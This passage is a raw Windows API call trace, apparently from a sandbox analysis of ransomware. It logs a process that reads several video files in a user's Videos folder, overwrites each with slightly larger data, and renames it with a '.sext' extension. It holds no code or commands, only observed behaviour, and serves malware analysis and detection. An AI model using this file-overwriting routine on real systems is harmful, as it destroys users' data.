(in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\*", lpFindFileData=0x12dfe0 | out: lpFindFileData=0x12dfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99642900, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0x5e8f8d80, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x5e8f8d80, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0104.701] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99642900, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0x5e8f8d80, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x5e8f8d80, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.701] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3dc23f0, ftCreationTime.dwHighDateTime=0x1d5df87, ftLastAccessTime.dwLowDateTime=0x7e740660, ftLastAccessTime.dwHighDateTime=0x1d5dcfc, ftLastWriteTime.dwLowDateTime=0x7e740660, ftLastWriteTime.dwHighDateTime=0x1d5dcfc, nFileSizeHigh=0x0, nFileSizeLow=0x111fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="8oN2827bxRQbgy N.flv", cAlternateFileName="8ON282~1.FLV")) returned 1 [0104.702] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c6c460, ftCreationTime.dwHighDateTime=0x1d5e488, ftLastAccessTime.dwLowDateTime=0x96d23460, ftLastAccessTime.dwHighDateTime=0x1d5e27f, ftLastWriteTime.dwLowDateTime=0x96d23460, ftLastWriteTime.dwHighDateTime=0x1d5e27f, nFileSizeHigh=0x0, nFileSizeLow=0x10fa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="csWBpBz2NeS.mkv", cAlternateFileName="CSWBPB~1.MKV")) returned 1 [0104.702] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6ed990, ftCreationTime.dwHighDateTime=0x1d5e24c, ftLastAccessTime.dwLowDateTime=0x2a2e5cb0, ftLastAccessTime.dwHighDateTime=0x1d5e137, ftLastWriteTime.dwLowDateTime=0x2a2e5cb0, ftLastWriteTime.dwHighDateTime=0x1d5e137, nFileSizeHigh=0x0, nFileSizeLow=0x15e64, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja hcjKSUJ6ece.mp4", cAlternateFileName="JAHCJK~1.MP4")) returned 1 [0104.702] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee836ee0, ftCreationTime.dwHighDateTime=0x1d5e0ae, ftLastAccessTime.dwLowDateTime=0x92553a30, ftLastAccessTime.dwHighDateTime=0x1d5e460, ftLastWriteTime.dwLowDateTime=0x92553a30, ftLastWriteTime.dwHighDateTime=0x1d5e460, nFileSizeHigh=0x0, nFileSizeLow=0x9dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="S2X8-FkEZzZP23.mp4", cAlternateFileName="S2X8-F~1.MP4")) returned 1 [0104.702] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60db1520, ftCreationTime.dwHighDateTime=0x1d5d7e9, ftLastAccessTime.dwLowDateTime=0x613ce940, ftLastAccessTime.dwHighDateTime=0x1d5e323, ftLastWriteTime.dwLowDateTime=0x613ce940, ftLastWriteTime.dwHighDateTime=0x1d5e323, nFileSizeHigh=0x0, nFileSizeLow=0x8acc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tsn9NGG_VAkVfW_bv1g.mp4", cAlternateFileName="TSN9NG~1.MP4")) returned 1 [0104.702] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc144b780, ftCreationTime.dwHighDateTime=0x1d5e7e9, ftLastAccessTime.dwLowDateTime=0xc3ffb6d0, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0xc3ffb6d0, ftLastWriteTime.dwHighDateTime=0x1d5de3b, nFileSizeHigh=0x0, nFileSizeLow=0x111b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="UT7DVa4lIuO.mp4", cAlternateFileName="UT7DVA~1.MP4")) returned 1 [0104.702] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e030 | out: lpFindFileData=0x12e030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc144b780, ftCreationTime.dwHighDateTime=0x1d5e7e9, ftLastAccessTime.dwLowDateTime=0xc3ffb6d0, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0xc3ffb6d0, ftLastWriteTime.dwHighDateTime=0x1d5de3b, nFileSizeHigh=0x0, nFileSizeLow=0x111b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="UT7DVa4lIuO.mp4", cAlternateFileName="UT7DVA~1.MP4")) returned 0 [0104.703] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0104.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e290) returned 1 [0104.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e250) returned 1 [0104.703] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv", lpFilePart=0x0) returned 0x5f [0104.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0104.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\8on2827bxrqbgy n.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.703] GetFileType (hFile=0x2e4) returned 0x1 [0104.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0104.703] GetFileType (hFile=0x2e4) returned 0x1 [0104.703] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e318 | out: lpFileSizeHigh=0x12e318*=0x0) returned 0x111fe [0104.703] ReadFile (in: hFile=0x2e4, lpBuffer=0x22acbd0, nNumberOfBytesToRead=0x111fe, lpNumberOfBytesRead=0x12e248, lpOverlapped=0x0 | out: lpBuffer=0x22acbd0*, lpNumberOfBytesRead=0x12e248*=0x111fe, lpOverlapped=0x0) returned 1 [0104.705] CloseHandle (hObject=0x2e4) returned 1 [0104.935] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv", lpFilePart=0x0) returned 0x5f [0104.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0104.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\8on2827bxrqbgy n.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.937] GetFileType (hFile=0x2e4) returned 0x1 [0104.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0104.937] GetFileType (hFile=0x2e4) returned 0x1 [0104.937] WriteFile (in: hFile=0x2e4, lpBuffer=0x23cb9a8*, nNumberOfBytesToWrite=0x11200, lpNumberOfBytesWritten=0x12e2a8, lpOverlapped=0x0 | out: lpBuffer=0x23cb9a8*, lpNumberOfBytesWritten=0x12e2a8*=0x11200, lpOverlapped=0x0) returned 1 [0104.939] CloseHandle (hObject=0x2e4) returned 1 [0104.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv", lpFilePart=0x0) returned 0x5f [0104.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv.sext", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv.sext", lpFilePart=0x0) returned 0x64 [0104.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e280) returned 1 [0104.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\8on2827bxrqbgy n.flv"), fInfoLevelId=0x0, lpFileInformation=0x12e360 | out: lpFileInformation=0x12e360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3dc23f0, ftCreationTime.dwHighDateTime=0x1d5df87, ftLastAccessTime.dwLowDateTime=0x7e740660, ftLastAccessTime.dwHighDateTime=0x1d5dcfc, ftLastWriteTime.dwLowDateTime=0x8cdb79e0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x11200)) returned 1 [0104.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e240) returned 1 [0104.945] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\8on2827bxrqbgy n.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\8oN2827bxRQbgy N.flv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\8on2827bxrqbgy n.flv.sext")) returned 1 [0104.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv", lpFilePart=0x0) returned 0x5a [0104.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0104.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\cswbpbz2nes.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0104.946] GetFileType (hFile=0x2e4) returned 0x1 [0104.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0104.946] GetFileType (hFile=0x2e4) returned 0x1 [0104.946] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e318 | out: lpFileSizeHigh=0x12e318*=0x0) returned 0x10fa1 [0104.946] ReadFile (in: hFile=0x2e4, lpBuffer=0x23dd1c8, nNumberOfBytesToRead=0x10fa1, lpNumberOfBytesRead=0x12e248, lpOverlapped=0x0 | out: lpBuffer=0x23dd1c8*, lpNumberOfBytesRead=0x12e248*=0x10fa1, lpOverlapped=0x0) returned 1 [0104.947] CloseHandle (hObject=0x2e4) returned 1 [0105.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv", lpFilePart=0x0) returned 0x5a [0105.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0105.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\cswbpbz2nes.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0105.103] GetFileType (hFile=0x2e4) returned 0x1 [0105.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0105.103] GetFileType (hFile=0x2e4) returned 0x1 [0105.104] WriteFile (in: hFile=0x2e4, lpBuffer=0x230d0b8*, nNumberOfBytesToWrite=0x10fb0, lpNumberOfBytesWritten=0x12e2a8, lpOverlapped=0x0 | out: lpBuffer=0x230d0b8*, lpNumberOfBytesWritten=0x12e2a8*=0x10fb0, lpOverlapped=0x0) returned 1 [0105.106] CloseHandle (hObject=0x2e4) returned 1 [0105.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv", lpFilePart=0x0) returned 0x5a [0105.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv.sext", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv.sext", lpFilePart=0x0) returned 0x5f [0105.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e280) returned 1 [0105.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\cswbpbz2nes.mkv"), fInfoLevelId=0x0, lpFileInformation=0x12e360 | out: lpFileInformation=0x12e360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c6c460, ftCreationTime.dwHighDateTime=0x1d5e488, ftLastAccessTime.dwLowDateTime=0x96d23460, ftLastAccessTime.dwHighDateTime=0x1d5e27f, ftLastWriteTime.dwLowDateTime=0x8cf5a900, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x10fb0)) returned 1 [0105.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e240) returned 1 [0105.109] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\cswbpbz2nes.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\csWBpBz2NeS.mkv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\cswbpbz2nes.mkv.sext")) returned 1 [0105.109] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4", lpFilePart=0x0) returned 0x5d [0105.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0105.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ja hcjksuj6ece.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0105.110] GetFileType (hFile=0x2e4) returned 0x1 [0105.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0105.110] GetFileType (hFile=0x2e4) returned 0x1 [0105.110] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e318 | out: lpFileSizeHigh=0x12e318*=0x0) returned 0x15e64 [0105.110] ReadFile (in: hFile=0x2e4, lpBuffer=0x122ddd58, nNumberOfBytesToRead=0x15e64, lpNumberOfBytesRead=0x12e248, lpOverlapped=0x0 | out: lpBuffer=0x122ddd58*, lpNumberOfBytesRead=0x12e248*=0x15e64, lpOverlapped=0x0) returned 1 [0105.113] CloseHandle (hObject=0x2e4) returned 1 [0105.211] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4", lpFilePart=0x0) returned 0x5d [0105.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0105.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ja hcjksuj6ece.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0105.213] GetFileType (hFile=0x2e4) returned 0x1 [0105.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0105.213] GetFileType (hFile=0x2e4) returned 0x1 [0105.213] WriteFile (in: hFile=0x2e4, lpBuffer=0x1234b620*, nNumberOfBytesToWrite=0x15e70, lpNumberOfBytesWritten=0x12e2a8, lpOverlapped=0x0 | out: lpBuffer=0x1234b620*, lpNumberOfBytesWritten=0x12e2a8*=0x15e70, lpOverlapped=0x0) returned 1 [0105.216] CloseHandle (hObject=0x2e4) returned 1 [0105.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4", lpFilePart=0x0) returned 0x5d [0105.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4.sext", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4.sext", lpFilePart=0x0) returned 0x62 [0105.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e280) returned 1 [0105.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ja hcjksuj6ece.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12e360 | out: lpFileInformation=0x12e360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6ed990, ftCreationTime.dwHighDateTime=0x1d5e24c, ftLastAccessTime.dwLowDateTime=0x2a2e5cb0, ftLastAccessTime.dwHighDateTime=0x1d5e137, ftLastWriteTime.dwLowDateTime=0x8d0652a0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x15e70)) returned 1 [0105.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e240) returned 1 [0105.221] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ja hcjksuj6ece.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\ja hcjKSUJ6ece.mp4.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ja hcjksuj6ece.mp4.sext")) returned 1 [0105.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4", lpFilePart=0x0) returned 0x5d [0105.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0105.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\s2x8-fkezzzp23.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0105.223] GetFileType (hFile=0x2e4) returned 0x1 [0105.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0105.223] GetFileType (hFile=0x2e4) returned 0x1 [0105.223] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e318 | out: lpFileSizeHigh=0x12e318*=0x0) returned 0x9dcd [0105.223] ReadFile (in: hFile=0x2e4, lpBuffer=0x240a410, nNumberOfBytesToRead=0x9dcd, lpNumberOfBytesRead=0x12e248, lpOverlapped=0x0 | out: lpBuffer=0x240a410*, lpNumberOfBytesRead=0x12e248*=0x9dcd, lpOverlapped=0x0) returned 1 [0105.224] CloseHandle (hObject=0x2e4) returned 1 [0107.051] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4", lpFilePart=0x0) returned 0x5d [0107.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0107.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\s2x8-fkezzzp23.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0107.052] GetFileType (hFile=0x2e4) returned 0x1 [0107.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0107.052] GetFileType (hFile=0x2e4) returned 0x1 